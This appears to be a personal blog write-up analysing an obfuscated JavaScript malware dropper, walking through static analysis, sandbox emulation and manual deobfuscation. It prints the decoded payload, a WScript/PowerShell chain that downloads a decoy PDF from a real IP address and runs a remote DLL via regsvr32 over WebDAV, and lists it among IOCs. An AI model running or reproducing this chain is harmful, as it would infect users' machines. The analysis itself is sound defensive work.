
Malware Analysis Javascript Deobfuscation

Intro

I recently started conducting some malware analysis, and I found myself particularly intrigued by a section focused on JavaScript code analysis. I thought it would be the perfect opportunity to dive deeper and sharpen my skills by working with real-world examples. So, here’s a quick and straightforward analysis to get started!

Sample

Tools

  1. REMnux - Linux
  2. Ghost Windows 10 (contains my own malware analysis tools)

Static Analysis

SHA256 hash: 58d9dfb6906f5d06e85773461bd8ecc23f836a73dc0ef98a537e2385faeaaf43cbf5c548e7564bf7c3a09fcbc01259a2

Well, let's give it a first look in Notepad++.


Observations

  1. The actual code that will execute is at the beginning of the script.
  2. Many variables are used to obfuscate the code. Each variable contains many characters, so our mission is to find the pattern by which the code is assembled from those variables.

Deobfuscation with SpiderMonkey

Let's try deobfuscating it with the SpiderMonkey tool in REMnux.

js -f sample.js

It didn't work well for deobfuscation, but it gave us one clue: an eval function at line 21.


So, I tried box-js, as it helps emulate the runtime components (for example, by faking the URLs the malware tries to reach).

box-js sample.js --download

When checking IOC.json and the rest of the files, I observed only that a registry key is being written; the other files contained weird scripts that are not related to the malware :XD.

Manual Deobfuscation

I will replace each variable with a readable "charX", where X is a number that increases, just to make it more readable.

Example:

this[mqihfsol+olhntqaar+igjpssh+hevjsqi+tslwgc+mkutxa+qmqctvq] == this[char1+char2+char3+char4+char5+char6+char7]

The final result will be easier to parse.


Now, there are many variables, each 28-45 characters long; we need to work out which character of each variable is actually used before running the script.

So, I started looking for something the script must include, such as http://, and I found this:

http://  ==   char15+char7+char7+char6+char38+char20+char20 

And I started looking at the values of each char; they are in sequence, i.e.:


And I figured out that the script uses the last char of each variable.


So, we now only need to replace each variable with its last char.
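The last-character pattern described above, as an added example that is not part of the original write-up: a small Node.js script that maps every `var name = "..."` declaration to its final character and rewrites each bracketed `a+b+c` chain into the string literal it resolves to. The sample it runs on is constructed here; its variable names and string contents are made up and not taken from the malware.

```javascript
// Added example (not from the original write-up). Constructed input that mimics
// the obfuscation pattern: long junk strings whose LAST character is the one used.
const constructedSample = `
var mqihfsol = "ZKqsdlkfjqweLKJHsdflkjQWEh";
var olhntqaar = "poiuLKJHsdfASDFqwerZXCVt";
var igjpssh = "mnbvLKJHQWERasdfzxcvp";
var hevjsqi = "QWERTYasdfghZXCVBnmq:";
var tslwgc = "lkjhgfdsaPOIUYT/";
this[mqihfsol+olhntqaar+olhntqaar+igjpssh+hevjsqi+tslwgc+tslwgc];
`;

// Map each `var name = "..."` / `var name = '...'` declaration to the last
// character of its string value (escape sequences are not decoded; the sample
// strings in this write-up end in plain characters).
function collectLastChars(src) {
  const map = new Map();
  const decl = /var\s+([A-Za-z_$][\w$]*)\s*=\s*(["'])((?:\\.|(?!\2).)*)\2/g;
  for (const m of src.matchAll(decl)) {
    const value = m[3];
    if (value.length > 0) map.set(m[1], value[value.length - 1]);
  }
  return map;
}

// Replace every bracketed chain of two or more known names, e.g. this[a+b+c],
// with the string literal built from their last characters. Chains that
// reference a name we did not see declared are left untouched so nothing is
// silently mis-resolved.
function resolveChains(src, map) {
  const chain = /\[\s*([A-Za-z_$][\w$]*(?:\s*\+\s*[A-Za-z_$][\w$]*)+)\s*\]/g;
  return src.replace(chain, (whole, body) => {
    const names = body.split('+').map((s) => s.trim());
    if (!names.every((n) => map.has(n))) return whole;
    return '[' + JSON.stringify(names.map((n) => map.get(n)).join('')) + ']';
  });
}

// Full pass: collect the last characters, then rewrite the chains.
function deobfuscate(src) {
  return resolveChains(src, collectLastChars(src));
}

console.log(deobfuscate(constructedSample));
```

Running it turns the final line of the constructed sample into `this["http://"];`, the same resolution the write-up reached by hand for char15+char7+char7+char6+char38+char20+char20.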

After replacement:


func=var0[ev  ""  al];func("array=[10374,12422,14470,13446,11398,12415];var2=this[WScript][CreateObject](WScript.Shell);var3=cmd /c powershell.exe -Command \Invoke-WebRequest -OutFile %temp%\\invoice.pdf http:// 193.143.1.205/invoice.php\&&start %temp%\\invoice.pdf&&cmd /c net use \\\\193.143.1.205@8888\\davwwwroot\\&&cmd /c regsvr32 /s \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll;var4 = var0[parseInt](var2[RegRead](HKLM_CURRENT_USER\\Control panel\\International\\Locale), 88);var4=9343;for(var1=0;var1<array[length];var1){if(var4 === array[var1]){var2[run](var3,0,0);break;}}")

IOCs

1. http://193.143.1.205/invoice.php\&&start %tmp%\\invoice.pdf

2. \\\\193.143.1.205@8888\\davwwwroot\\

3. \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll

4. HKLM_CURRENT_USER\\Control panel\\International\\Locale

Behavioural Analysis

Let's ping the C2 to see if it is active.


Yes, it is. Now let's download invoice.php, which will be saved as %tmp%\\invoice.pdf.


It is a PDF; when I parsed it with pdf-parser.py, it didn't contain any JS code, and I confirmed that with VirusTotal.


So, let's look further and try to download the DLL 100758775027.dll.

But the server was off.


So, our analysis concludes here.

See you! 🚀